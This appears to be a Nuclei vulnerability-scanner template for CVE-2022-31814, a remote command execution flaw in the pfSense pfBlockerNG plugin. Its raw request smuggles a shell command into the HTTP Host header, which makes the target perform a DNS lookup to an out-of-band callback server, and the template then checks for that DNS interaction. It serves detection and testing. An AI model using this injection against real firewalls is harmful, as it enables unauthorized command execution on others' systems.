id: CVE-2022-31814
info:
  name: pfSense pfblockerng plugin rce
  author: EvergreenCartoons
  severity: critical

requests:

  - raw:
      - |+
        GET /pfblockerng/www/index.php HTTP/1.1
        Host: ' *; host {{interactsh-url}}; '
        Accept: */*

    unsafe: true

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the DNS Interaction
        words:
          - "dns"